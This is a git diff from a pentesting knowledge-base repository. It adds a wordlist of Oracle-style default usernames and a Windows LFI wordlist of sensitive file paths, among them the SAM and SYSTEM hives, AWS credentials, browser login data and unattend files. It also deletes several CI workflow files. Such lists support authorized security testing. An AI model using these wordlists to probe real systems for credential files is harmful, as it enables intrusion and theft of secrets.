+SARAHMANDY +SCM1 +SCM2 +SCM3 +SCM4 +scott +SCOTT +SDAVIS +sdos_icsap +SDOS_ICSAP +secdemo +SECDEMO +SEDWARDS +SELLCM +SELLER +SELLTREAS +serviceconsumer1 +SERVICECONSUMER1 +SERVICES +SETUP +sh +SH +SID +si_informtn_schema +SI_INFORMTN_SCHEMA +siteminder +SITEMINDER +SKAYE +SKYTETSUKA +slide +SLIDE +SLSAA +SLSMGR +SLSREP +spierson +SPIERSON +SRABBITT +SRALPHS +SRAY +SRIVERS +SSA1 +SSA2 +SSA3 +SSC1 +SSC2 +SSC3 +SSOSDK +ssp +SSP +SSS1 +starter +STARTER +strat_user +STRAT_USER +SUPPLIER +SVM7333 +SVM7334 +SVM810 +SVM811 +SVM812 +SVM9 +SVMB733 +SVP1 +swpro +SWPRO +swuser +SWUSER +SY810 +SY811 +SY812 +SY9 +sympa +SYMPA +sys +SYS +SYS7333 +SYS7334 +sysadm +SYSADM +sysadmin +SYSADMIN +SYSB733 +sysman +SYSMAN +system +SYSTEM +tahiti +TAHITI +talbot +TALBOT +TDEMARCO +tdos_icsap +TDOS_ICSAP +tec +TEC +test +TEST +TESTCTL +TESTDTA +testpilot +TESTPILOT +test_user +TEST_USER +thinsample +THINSAMPLE +tibco +TIBCO +tip37 +TIP37 +TRA1 +tracesvr +TRACESVR +travel +TRAVEL +TRBM1 +TRCM1 +TRDM1 +TRRM1 +tsdev +TSDEV +tsuser +TSUSER +turbine +TURBINE +TWILLIAMS +UDDISYS +ultimate +ULTIMATE +um_admin +UM_ADMIN +um_client +UM_CLIENT +user +USER +user0 +USER0 +user1 +USER1 +user2 +USER2 +user3 +USER3 +user4 +USER4 +user5 +USER5 +user6 +USER6 +user7 +USER7 +user8 +USER8 +user9 +USER9 +user_name +USER_NAME +usuario +USUARIO +utility +UTILITY +utlbstatu +UTLBSTATU +vea +VEA +veh +VEH +vertex_login +VERTEX_LOGIN +VIDEO31 +VIDEO4 +VIDEO5 +videouser +VIDEOUSER +vif_developer +VIF_DEVELOPER +viruser +VIRUSER +VP1 +VP2 +VP3 +VP4 +VP5 +VP6 +vpd_admin +VPD_ADMIN +vrr1 +VRR1 +WAA1 +WAA2 +WCRSYS +webcal01 +WEBCAL01 +webdb +WEBDB +webread +WEBREAD +websys +WEBSYS +webuser +WEBUSER +WENDYCHO +west +WEST +wfadmin +WFADMIN +wh +WH +wip +WIP +WIRELESS +wkadmin +WKADMIN +wkproxy +WKPROXY +wksys +WKSYS +wk_test +WK_TEST +wkuser +WKUSER +wms +WMS +wmsys +WMSYS +wob +WOB +wps +WPS +wsh +WSH +wsm +WSM +www +WWW +wwwuser +WWWUSER +xademo +XADEMO +xdb +XDB +XDO +xdp +XDP +xla +XLA +XLE +XNB +xnc +XNC +xni +XNI +xnm +XNM +xnp +XNP +xns +XNS +xprt +XPRT +xtr +XTR +YCAMPOS +YSANCHEZ +ZFA +ZPB +ZSA +ZX diff --git a/src/files/vncpwd.zip b/.gitbook/assets/vncpwd.zip similarity index 100% rename from src/files/vncpwd.zip rename to .gitbook/assets/vncpwd.zip diff --git a/src/files/vpnIDs.txt b/.gitbook/assets/vpnids.txt similarity index 100% rename from src/files/vpnIDs.txt rename to .gitbook/assets/vpnids.txt diff --git a/.gitbook/assets/winlfi.txt b/.gitbook/assets/winlfi.txt new file mode 100644 index 00000000000..bd0b3746c44 --- /dev/null +++ b/.gitbook/assets/winlfi.txt @@ -0,0 +1,218 @@ +C:/$recycle.bin/s-1-5-18/desktop.ini +C:/apache2/log/access.log +C:/apache2/log/access_log +C:/apache2/log/error.log +C:/apache2/log/error_log +C:/apache2/logs/access.log +C:/apache2/logs/access_log +C:/apache2/logs/error.log +C:/apache2/logs/error_log +C:/apache/log/access.log +C:/apache/log/access_log +C:/apache/log/error.log +C:/apache/log/error_log +C:/apache/logs/access.log +C:/apache/logs/access_log +C:/apache/logs/error.log +C:/apache/logs/error_log +C:/apache/php/php.ini +C:/boot.ini +C:/documents and settings/administrator/desktop/desktop.ini +C:/documents and settings/administrator/ntuser.dat +C:/documents and settings/administrator/ntuser.ini +C:/home2/bin/stable/apache/php.ini +C:/home/bin/stable/apache/php.ini +C:/inetpub/logs/logfiles +C:/inetpub/wwwroot/global.asa +C:/inetpub/wwwroot/index.asp +C:/inetpub/wwwroot/web.config +C:/log/access.log +C:/log/access_log +C:/log/error.log +C:/log/error_log +C:/log/httpd/access_log +C:/log/httpd/error_log +C:/logs/access.log +C:/logs/access_log +C:/logs/error.log +C:/logs/error_log +C:/logs/httpd/access_log +C:/logs/httpd/error_log +C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT +C:/mysql/bin/my.ini +C:/mysql/data/hostname.err +C:/mysql/data/mysql.err +C:/mysql/data/mysql.log +C:/mysql/my.cnf +C:/mysql/my.ini +C:/opt/xampp/logs/access.log +C:/opt/xampp/logs/access_log +C:/opt/xampp/logs/error.log +C:/opt/xampp/logs/error_log +C:/php4/php.ini +C:/php4/sessions/ +C:/php5/php.ini +C:/php5/sessions/ +C:/php/php.ini +C:/php/sessions/ +C:/programdata/mcafee/common framework/sitelist.xml +C:/program files/apache group/apache2/conf/httpd.conf +C:/program files/apache group/apache/conf/access.log +C:/program files/apache group/apache/conf/error.log +C:/program files/apache group/apache/conf/httpd.conf +C:/program files/apache group/apache/logs/access.log +C:/program files/apache group/apache/logs/error.log +C:/program files/filezilla server/filezilla server.xml +C:/program files/mysql/data/hostname.err +C:/program files/mysql/data/mysql-bin.log +C:/program files/mysql/data/mysql.err +C:/program files/mysql/data/mysql.log +C:/program files/mysql/my.cnf +C:/program files/mysql/my.ini +C:/program files/mysql/mysql server 5.0/data/hostname.err +C:/program files/mysql/mysql server 5.0/data/mysql-bin.log +C:/program files/mysql/mysql server 5.0/data/mysql.err +C:/program files/mysql/mysql server 5.0/data/mysql.log +C:/program files/mysql/mysql server 5.0/my.cnf +C:/program files/mysql/mysql server 5.0/my.ini +C:/program files/mysql/mysql server 5.1/my.ini +C:/program files (x86)/apache group/apache2/conf/httpd.conf +C:/program files (x86)/apache group/apache/conf/access.log +C:/program files (x86)/apache group/apache/conf/error.log +C:/program files (x86)/apache group/apache/conf/httpd.conf +C:/program files (x86)/apache group/apache/logs/access.log +C:/program files (x86)/apache group/apache/logs/error.log +C:/program files (x86)/filezilla server/filezilla server.xml +C:/program files (x86)/mysql/data/hostname.err +C:/program files (x86)/mysql/data/mysql-bin.log +C:/program files (x86)/mysql/data/mysql.err +C:/program files (x86)/mysql/data/mysql.log +C:/program files (x86)/mysql/my.cnf +C:/program files (x86)/mysql/my.ini +C:/program files (x86)/mysql/mysql server 5.0/data/hostname.err +C:/program files (x86)/mysql/mysql server 5.0/data/mysql-bin.log +C:/program files (x86)/mysql/mysql server 5.0/data/mysql.err +C:/program files (x86)/mysql/mysql server 5.0/data/mysql.log +C:/program files (x86)/mysql/mysql server 5.0/my.cnf +C:/program files (x86)/mysql/mysql server 5.0/my.ini +C:/program files (x86)/mysql/mysql server 5.1/my.ini +C:/program files (x86)/xampp/apache/conf/httpd.conf +C:/program files/xampp/apache/conf/httpd.conf +C:/sysprep.inf +C:/sysprep/sysprep.inf +C:/sysprep/sysprep.xml +C:/sysprep.xml +C:/system32/inetsrv/metabase.xml +C:/system volume information/wpsettings.dat +C:/unattended.txt +C:/unattended.xml +C:/unattend.txt +C:/unattend.xml +C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks +C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks.bak +C:/users/administrator/appdata/local/google/chrome/user data/default/cookies +C:/users/administrator/appdata/local/google/chrome/user data/default/history +C:/users/administrator/appdata/local/google/chrome/user data/default/last session +C:/users/administrator/appdata/local/google/chrome/user data/default/login data +C:/users/administrator/appdata/local/google/chrome/user data/default/preferences +C:/users/administrator/appdata/local/google/chrome/user data/default/secure preferences +C:/users/administrator/appdata/local/google/chrome/user data/default/top sites +C:/users/administrator/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt +C:/users/administrator/.aws/config +C:/users/administrator/.aws/credentials +C:/users/administrator/desktop/desktop.ini +C:/users/administrator/desktop/proof.txt +C:/users/administrator/.elasticbeanstalk/config +C:/users/administrator/ntuser.dat +C:/users/administrator/ntuser.ini +C:/windows/csc/v2.0.6/pq +C:/windows/csc/v2.0.6/sm +C:/windows/debug/netsetup.log +C:/windows/explorer.exe +C:/windows/iis5.log +C:/windows/iis6.log +C:/windows/iis7.log +C:/windows/iis8.log +C:/windows/notepad.exe +C:/windows/panther/setupinfo +C:/windows/panther/setupinfo.bak +C:/windows/panther/sysprep.inf +C:/windows/panther/sysprep.xml +C:/windows/panther/unattended.txt +C:/windows/panther/unattended.xml +C:/windows/panther/unattend/setupinfo +C:/windows/panther/unattend/setupinfo.bak +C:/windows/panther/unattend/sysprep.inf +C:/windows/panther/unattend/sysprep.xml +C:/windows/panther/unattend.txt +C:/windows/panther/unattend/unattended.txt +C:/windows/panther/unattend/unattended.xml +C:/windows/panther/unattend/unattend.txt +C:/windows/panther/unattend/unattend.xml +C:/windows/panther/unattend.xml +C:/windows/php.ini +C:/windows/repair/sam +C:/windows/repair/security +C:/windows/repair/software +C:/windows/repair/system +C:/windows/system32/config/appevent.evt +C:/windows/system32/config/default.sav +C:/windows/system32/config/regback/default +C:/windows/system32/config/regback/sam +C:/windows/system32/config/regback/security +C:/windows/system32/config/regback/software +C:/windows/system32/config/regback/system +C:/windows/system32/config/sam +C:/windows/system32/config/secevent.evt +C:/windows/system32/config/security.sav +C:/windows/system32/config/software.sav +C:/windows/system32/config/system +C:/windows/system32/config/system.sa +C:/windows/system32/config/system.sav +C:/windows/system32/drivers/etc/hosts +C:/windows/system32/eula.txt +C:/windows/system32/inetsrv/config/applicationhost.config +C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml +C:/windows/system32/license.rtf +C:/windows/system32/logfiles/httperr/httperr1.log +C:/windows/system32/sysprep.inf +C:/windows/system32/sysprepsysprep.inf +C:/windows/system32/sysprep/sysprep.xml +C:/windows/system32/sysprepsysprep.xml +C:/windows/system32/sysprepunattended.txt +C:/windows/system32/sysprepunattended.xml +C:/windows/system32/sysprepunattend.txt +C:/windows/system32/sysprepunattend.xml +C:/windows/system32/sysprep.xml +C:/windows/system32/unattended.txt +C:/windows/system32/unattended.xml +C:/windows/system32/unattend.txt +C:/windows/system32/unattend.xml +C:/windows/system.ini +C:/windows/temp/ +C:/windows/windowsupdate.log +C:/windows/win.ini +C:/winnt/php.ini +C:/winnt/win.ini +C:/xampp/apache/bin/php.ini +C:/xampp/apache/conf/httpd.conf +C:/xampp/apache/logs/access.log +C:/xampp/apache/logs/error.log +C:/xampp/filezillaftp/filezilla server.xml +C:/xampp/filezillaftp/logs +C:/xampp/filezillaftp/logs/access.log +C:/xampp/filezillaftp/logs/error.log +C:/xampp/mercurymail/logs/access.log +C:/xampp/mercurymail/logs/error.log +C:/xampp/mercurymail/mercury.ini +C:/xampp/mysql/data/mysql.err +C:/xampp/phpmyadmin/config.inc +C:/xampp/phpmyadmin/config.inc.php +C:/xampp/phpmyadmin/phpinfo.php +C:/xampp/php/php.ini +C:/xampp/sendmail/sendmail.ini +C:/xampp/sendmail/sendmail.log +C:/xampp/tomcat/conf/tomcat-users.xml +C:/xampp/tomcat/conf/web.xml +C:/xampp/webalizer/webalizer.conf +C:/xampp/webdav/webdav.txt diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index 67d6d075cf4..d145fd3c508 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -1 +1 @@ -github: carlospolop +custom: ['https://github.com/sponsors/carlospolop', 'https://www.buymeacoffee.com/carlospolop'] diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md deleted file mode 100644 index 68ca5efc882..00000000000 --- a/.github/pull_request_template.md +++ /dev/null @@ -1,11 +0,0 @@ -You can remove this content before sending the PR: - -## Attribution -We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone. - - -Thank you for contributing to HackTricks! - - - - diff --git a/.github/workflows/auto_merge_approved_prs.yml b/.github/workflows/auto_merge_approved_prs.yml deleted file mode 100644 index f776811b362..00000000000 --- a/.github/workflows/auto_merge_approved_prs.yml +++ /dev/null @@ -1,242 +0,0 @@ -name: Auto Merge Approved PRs - -on: - schedule: - - cron: '0 */1 * * *' # Every 1 hour - workflow_dispatch: # Allow manual triggering - -permissions: - contents: write - pull-requests: write - actions: read - -jobs: - auto-merge-prs: - runs-on: ubuntu-latest - - steps: - - name: Checkout repository - uses: actions/checkout@v4 - with: - fetch-depth: 1 # Only need latest commit for PR operations - token: ${{ secrets.PAT_TOKEN }} - - - name: Configure git - run: | - git config --global user.email "action@github.com" - git config --global user.name "GitHub Action" - - - name: Install GitHub CLI - run: | - curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \ - && sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \ - && echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \ - && sudo apt update \ - && sudo apt install gh -y - - - name: Check for running workflows - id: check_workflows - run: | - gh_with_retry() { - local max_attempts=5 - local base_sleep_seconds=2 - local attempt=1 - local stderr_file - stderr_file=$(mktemp) - - while true; do - if gh "$@" 2>"$stderr_file"; then - rm -f "$stderr_file" - return 0 - fi - - local exit_code=$? - if [ "$attempt" -ge "$max_attempts" ]; then - echo "gh command failed after $max_attempts attempts: gh $*" >&2 - cat "$stderr_file" >&2 - rm -f "$stderr_file" - return "$exit_code" - fi - - local sleep_for=$((base_sleep_seconds * attempt)) - echo "gh command failed (attempt $attempt/$max_attempts): gh $*" >&2 - cat "$stderr_file" >&2 - echo "Retrying in ${sleep_for}s..." >&2 - sleep "$sleep_for" - attempt=$((attempt + 1)) - done - } - - # Get all running workflows except this one - running_workflows=$(gh_with_retry run list --status in_progress --json workflowName,name --repo "$GITHUB_REPOSITORY" --jq '.[].name' | grep -v "Auto Merge Approved PRs" | wc -l) - echo "running_workflows=$running_workflows" >> $GITHUB_OUTPUT - - if [ "$running_workflows" -gt 0 ]; then - echo "Found $running_workflows running workflows. Exiting to avoid conflicts." - echo "should_continue=false" >> $GITHUB_OUTPUT - else - echo "No other workflows running. Proceeding with auto-merge." - echo "should_continue=true" >> $GITHUB_OUTPUT - fi - env: - GH_TOKEN: ${{ secrets.PAT_TOKEN }} - - - name: Find and merge approved PRs - if: steps.check_workflows.outputs.should_continue == 'true' - run: | - gh_with_retry() { - local max_attempts=5 - local base_sleep_seconds=2 - local attempt=1 - local stderr_file - stderr_file=$(mktemp) - - while true; do - if gh "$@" 2>"$stderr_file"; then - rm -f "$stderr_file" - return 0 - fi - - local exit_code=$? - if [ "$attempt" -ge "$max_attempts" ]; then - echo "gh command failed after $max_attempts attempts: gh $*" >&2 - cat "$stderr_file" >&2 - rm -f "$stderr_file" - return "$exit_code" - fi - - local sleep_for=$((base_sleep_seconds * attempt)) - echo "gh command failed (attempt $attempt/$max_attempts): gh $*" >&2 - cat "$stderr_file" >&2 - echo "Retrying in ${sleep_for}s..." >&2 - sleep "$sleep_for" - attempt=$((attempt + 1)) - done - } - - authorized_user="carlospolop" - max_merges=2 - - echo "Authorized user: $authorized_user" - echo "Looking for PRs with exact comment 'merge' from $authorized_user..." - - # Get all open PRs, paginating through the full result set instead of - # relying on `gh pr list`'s default page size. - prs=$(gh_with_retry api --paginate "repos/$GITHUB_REPOSITORY/pulls?state=open&per_page=100" | jq -s 'add | map({number, title, url: .html_url, author: {login: .user.login}})') - - if [ "$prs" = "[]" ]; then - echo "No open PRs found." - exit 0 - fi - - # Create a temp file to track merge count - echo "0" > /tmp/merged_count - - # Process each PR - echo "$prs" | jq -r '.[] | @base64' | while IFS= read -r pr_data; do - current_count=$(cat /tmp/merged_count) - if [ "$current_count" -ge "$max_merges" ]; then - echo "Reached maximum merge limit ($max_merges). Stopping." - break - fi - - pr_info=$(echo "$pr_data" | base64 --decode) - pr_number=$(echo "$pr_info" | jq -r '.number') - pr_title=$(echo "$pr_info" | jq -r '.title') - pr_url=$(echo "$pr_info" | jq -r '.url') - pr_author=$(echo "$pr_info" | jq -r '.author.login') - - echo "Checking PR #$pr_number: $pr_title (author: $pr_author)" - - # Special case: allow merge without "merge" comment for Research Update Enhanced PRs by the authorized user - eligible_by_title=false - if [[ "$pr_title" == "Research Update Enhanced"* && "$pr_author" == "$authorized_user" ]]; then - echo "PR #$pr_number qualifies for direct merge based on title and author." - eligible_by_title=true - fi - - # Check if any comment from carlospolop contains exactly "merge" - has_merge_comment=false - if [ "$eligible_by_title" != true ]; then - # Get all comments for this PR - if ! comments=$(gh_with_retry pr view "$pr_number" --json comments --jq '.comments[]' --repo "$GITHUB_REPOSITORY"); then - echo "Failed to fetch comments for PR #$pr_number after retries. Skipping PR." - continue - fi - - # Print all comment authors for debugging - echo "Comments in PR #$pr_number:" - echo "$comments" | jq -r '" - Author: " + .author.login + " | Comment: " + (.body | split("\n")[0] | .[0:100])' - - echo "$comments" | jq -r '.author.login + "|" + .body' | while IFS='|' read -r comment_author comment_body; do - if [ "$comment_author" = "$authorized_user" ]; then - if echo "$comment_body" | grep -iExq "merge"; then - echo "Found exact 'merge' comment from $authorized_user in PR #$pr_number" - echo "true" > /tmp/has_merge_comment_$pr_number - break - fi - fi - done - fi - - if [ -f "/tmp/has_merge_comment_$pr_number" ]; then - has_merge_comment=true - fi - - if [ "$has_merge_comment" = true ] || [ "$eligible_by_title" = true ]; then - echo "Attempting to merge PR #$pr_number..." - - # Get PR details including head branch - if ! pr_details=$(gh_with_retry pr view "$pr_number" --json headRefName,baseRefName --repo "$GITHUB_REPOSITORY"); then - echo "Failed to fetch details for PR #$pr_number after retries. Skipping PR." - continue - fi - head_branch=$(echo "$pr_details" | jq -r '.headRefName') - base_branch=$(echo "$pr_details" | jq -r '.baseRefName') - - # --- Polling for non-UNKNOWN mergeable status --- - max_retries=10 - retry=0 - while true; do - if ! pr_mergeable=$(gh_with_retry pr view "$pr_number" --json mergeable --jq '.mergeable' --repo "$GITHUB_REPOSITORY"); then - echo "Failed to fetch mergeable status for PR #$pr_number after retries." - pr_mergeable="UNKNOWN" - fi - if [ "$pr_mergeable" != "UNKNOWN" ]; then - break - fi - if [ $retry -ge $max_retries ]; then - echo "Timeout: mergeable status is still UNKNOWN after $max_retries retries" - break - fi - echo "mergeable status UNKNOWN, retrying in 2s..." - sleep 2 - retry=$((retry + 1)) - done - - if [ "$pr_mergeable" = "MERGEABLE" ]; then - if gh pr merge "$pr_number" --merge --delete-branch --repo "$GITHUB_REPOSITORY"; then - echo "Successfully merged PR #$pr_number: $pr_title" - current_count=$(cat /tmp/merged_count) - echo $((current_count + 1)) > /tmp/merged_count - else - echo "Failed to merge PR #$pr_number: $pr_title" - fi - elif [ "$pr_mergeable" = "CONFLICTED" ] || [ "$pr_mergeable" = "CONFLICTING" ]; then - echo "PR #$pr_number has conflicts. Skipping auto-merge so it can be resolved manually." - else - echo "PR #$pr_number is not mergeable (status: $pr_mergeable)" - fi - else - echo "No exact 'merge' comment found from $authorized_user in PR #$pr_number" - fi - - rm -f "/tmp/has_merge_comment_$pr_number" - done - - final_count=$(cat /tmp/merged_count) - echo "Auto-merge process completed. Merged $final_count PRs." - rm -f /tmp/merged_count - - env: - GH_TOKEN: ${{ secrets.PAT_TOKEN }} diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml deleted file mode 100644 index 193168d6e99..00000000000 --- a/.github/workflows/build_master.yml +++ /dev/null @@ -1,221 +0,0 @@ -name: Build Master - -on: - push: - branches: - - master - paths-ignore: - - '.gitignore' - - 'book/**' - workflow_dispatch: - -concurrency: build_master - -permissions: - packages: write - id-token: write - contents: write - -jobs: - run-translation: - runs-on: ubuntu-latest - container: - image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest - environment: prod - - steps: - - name: Checkout code - uses: actions/checkout@v4 - with: - fetch-depth: 1 # Only fetch the latest commit for faster cloning - - # Build the mdBook - - name: Build mdBook - run: MDBOOK_BOOK__LANGUAGE=en mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1) - - - name: Post-process SEO artifacts - run: | - python3 scripts/seo_postprocess.py pages \ - --book-dir ./book \ - --site-url https://hacktricks.wiki \ - --lang en \ - --default-lang en \ - --site-name "HackTricks" - - - name: Install GitHub CLI - run: | - curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \ - && sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \ - && echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \ - && sudo apt update \ - && sudo apt install gh -y - - - name: Push search index to hacktricks-searchindex repo - shell: bash - env: - PAT_TOKEN: ${{ secrets.PAT_TOKEN }} - run: | - set -euo pipefail - - ASSET="book/searchindex.js" - TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" - FILENAME="searchindex-en.js" - - if [ ! -f "$ASSET" ]; then - echo "Expected $ASSET to exist after build" >&2 - exit 1 - fi - - TOKEN="${PAT_TOKEN}" - if [ -z "$TOKEN" ]; then - echo "No PAT_TOKEN available" >&2 - exit 1 - fi - - # Clone the searchindex repo - git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo - - cd /tmp/searchindex-repo - git config user.name "GitHub Actions" - git config user.email "github-actions@github.com" - - # Compress the searchindex file - cd "${GITHUB_WORKSPACE}" - gzip -9 -k -f "$ASSET" - - # Show compression stats - ORIGINAL_SIZE=$(wc -c < "$ASSET") - COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") - RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") - echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" - - # XOR encrypt the compressed file - KEY='Prevent_Online_AVs_From_Flagging_HackTricks_Search_Gzip_As_Malicious_394h7gt8rf9u3rf9g' - cat > /tmp/xor_encrypt.py << 'EOF' - import sys - key = sys.argv[1] - input_file = sys.argv[2] - output_file = sys.argv[3] - with open(input_file, 'rb') as f: - data = f.read() - key_bytes = key.encode('utf-8') - encrypted = bytearray(len(data)) - for i in range(len(data)): - encrypted[i] = data[i] ^ key_bytes[i % len(key_bytes)] - with open(output_file, 'wb') as f: - f.write(encrypted) - print(f"Encrypted: {len(data)} bytes") - EOF - python3 /tmp/xor_encrypt.py "$KEY" "${ASSET}.gz" "${ASSET}.gz.enc" - - # Copy the encrypted .gz version to the searchindex repo - cd /tmp/searchindex-repo - cp "${GITHUB_WORKSPACE}/${ASSET}.gz.enc" "${FILENAME}.gz" - - # Stage the updated file - git add "${FILENAME}.gz" - - # Commit and push with retry logic - if git diff --staged --quiet; then - echo "No changes to commit" - else - TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") - git commit -m "Update searchindex files - ${TIMESTAMP}" - - # Retry push up to 20 times with pull --rebase between attempts - MAX_RETRIES=20 - RETRY_COUNT=0 - while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do - if git push origin master; then - echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" - break - else - RETRY_COUNT=$((RETRY_COUNT + 1)) - if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then - echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." - - # Try normal rebase first - if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then - echo "Rebase successful, retrying push..." - else - # If rebase fails due to divergent histories (orphan branch reset), re-clone - if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then - echo "Detected history rewrite, re-cloning repository..." - cd /tmp - rm -rf searchindex-repo - git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo - cd searchindex-repo - git config user.name "GitHub Actions" - git config user.email "github-actions@github.com" - - # Re-copy the .gz version - cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" - - git add "${FILENAME}.gz" - TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") - git commit -m "Update searchindex files - ${TIMESTAMP}" - echo "Re-cloned and re-committed, will retry push..." - else - echo "Rebase failed for unknown reason, retrying anyway..." - fi - fi - - sleep 1 - else - echo "Failed to push after $MAX_RETRIES attempts" - exit 1 - fi - fi - done - fi - - echo "Successfully pushed searchindex files" - - - # Login in AWs - - name: Configure AWS credentials using OIDC - uses: aws-actions/configure-aws-credentials@v3 - with: - role-to-assume: ${{ secrets.AWS_ROLE_ARN }} - aws-region: us-east-1 - - # Sync the build to S3. mdBook refreshes mtimes on every build, so first - # age byte-identical files based on S3 ETags; `s3 sync` then uploads only - # genuinely changed/new output while retaining normal --delete behavior. - - name: Sync to S3 - run: | - aws s3api list-objects-v2 \ - --bucket hacktricks-wiki \ - --prefix en/ \ - --output json > /tmp/s3-en-manifest.json - python3 scripts/mark_unchanged_s3_files.py \ - --source ./book \ - --manifest /tmp/s3-en-manifest.json \ - --remote-prefix en/ - aws s3 sync ./book s3://hacktricks-wiki/en --delete - - - name: Upload root sitemap index - run: | - LANGS=$(aws s3api list-objects-v2 --bucket hacktricks-wiki --delimiter / --query 'CommonPrefixes[].Prefix' --output text | tr '\t' '\n' | sed 's:/$::' | grep -E '^[a-z]{2}$' | sort | paste -sd, -) - if [ -z "$LANGS" ]; then - LANGS="en" - fi - python3 scripts/seo_postprocess.py index --site-url https://hacktricks.wiki --languages "$LANGS" --output ./sitemap.xml - aws s3 cp ./sitemap.xml s3://hacktricks-wiki/sitemap.xml --content-type application/xml --cache-control max-age=300 - - - name: Upload root ads.txt - run: aws s3 cp ./src/ads.txt s3://hacktricks-wiki/ads.txt --content-type text/plain --cache-control max-age=300 - - - name: Upload root robots.txt - run: | - aws s3 cp ./src/robots.txt s3://hacktricks-wiki/robots.txt --content-type text/plain --cache-control max-age=300 - aws s3 cp ./src/robots.txt s3://hacktricks-wiki/en/robots.txt --content-type text/plain --cache-control max-age=300 - - - name: Invalidate CloudFront HTML and SEO assets - run: | - # /en/* covers /en/robots.txt and /en/sitemap.xml; only invalidate - # root SEO files separately. - aws cloudfront create-invalidation \ - --distribution-id "${{ secrets.CLOUDFRONT_DISTRIBUTION_ID }}" \ - --paths "/en/*" "/robots.txt" "/sitemap.xml" - diff --git a/.github/workflows/cleanup_branches.yml b/.github/workflows/cleanup_branches.yml deleted file mode 100644 index 1ee90cd43e6..00000000000 --- a/.github/workflows/cleanup_branches.yml +++ /dev/null @@ -1,204 +0,0 @@ -name: Cleanup Merged/Closed PR Branches - -on: - schedule: - - cron: '0 2 * * 0' # Every Sunday at 2 AM UTC - workflow_dispatch: # Allow manual triggering - inputs: - dry_run: - description: 'Dry run (show what would be deleted without actually deleting)' - required: false - default: 'false' - type: boolean - -permissions: - contents: write - pull-requests: read - -jobs: - cleanup-branches: - runs-on: ubuntu-latest - - steps: - - name: Checkout repository - uses: actions/checkout@v4 - with: - fetch-depth: 0 # Need full history to see all branches - token: ${{ secrets.PAT_TOKEN }} - - - name: Install GitHub CLI - run: | - curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \ - && sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \ - && echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \ - && sudo apt update \ - && sudo apt install gh -y - - - name: Configure git - run: | - git config --global user.email "action@github.com" - git config --global user.name "GitHub Action" - - - name: Cleanup merged/closed PR branches - env: - GH_TOKEN: ${{ secrets.PAT_TOKEN }} - run: | - echo "Starting branch cleanup process..." - - # Check if this is a dry run - DRY_RUN="${{ github.event.inputs.dry_run || 'false' }}" - if [ "$DRY_RUN" = "true" ]; then - echo "🔍 DRY RUN MODE - No branches will actually be deleted" - echo "" - fi - - # Define protected branches and patterns - protected_branches=( - "master" - "main" - ) - - # Translation branch patterns (any 2-letter combination) - translation_pattern="^[a-zA-Z]{2}$" - - # Get all remote branches except protected ones - echo "Fetching all remote branches..." - git fetch --all --prune - - # Get list of all remote branches (excluding HEAD) - all_branches=$(git branch -r | grep -v 'HEAD' | sed 's/origin\///' | grep -v '^$') - - # Get all open PRs to identify branches with open PRs - echo "Getting list of open PRs..." - open_pr_branches=$(gh pr list --state open --json headRefName --jq '.[].headRefName' | sort | uniq) - - echo "Open PR branches:" - echo "$open_pr_branches" - echo "" - - deleted_count=0 - skipped_count=0 - - for branch in $all_branches; do - branch=$(echo "$branch" | xargs) # Trim whitespace - - # Skip if empty - if [ -z "$branch" ]; then - continue - fi - - echo "Checking branch: $branch" - - # Check if it's a protected branch - is_protected=false - for protected in "${protected_branches[@]}"; do - if [ "$branch" = "$protected" ]; then - echo " ✓ Skipping protected branch: $branch" - is_protected=true - skipped_count=$((skipped_count + 1)) - break - fi - done - - 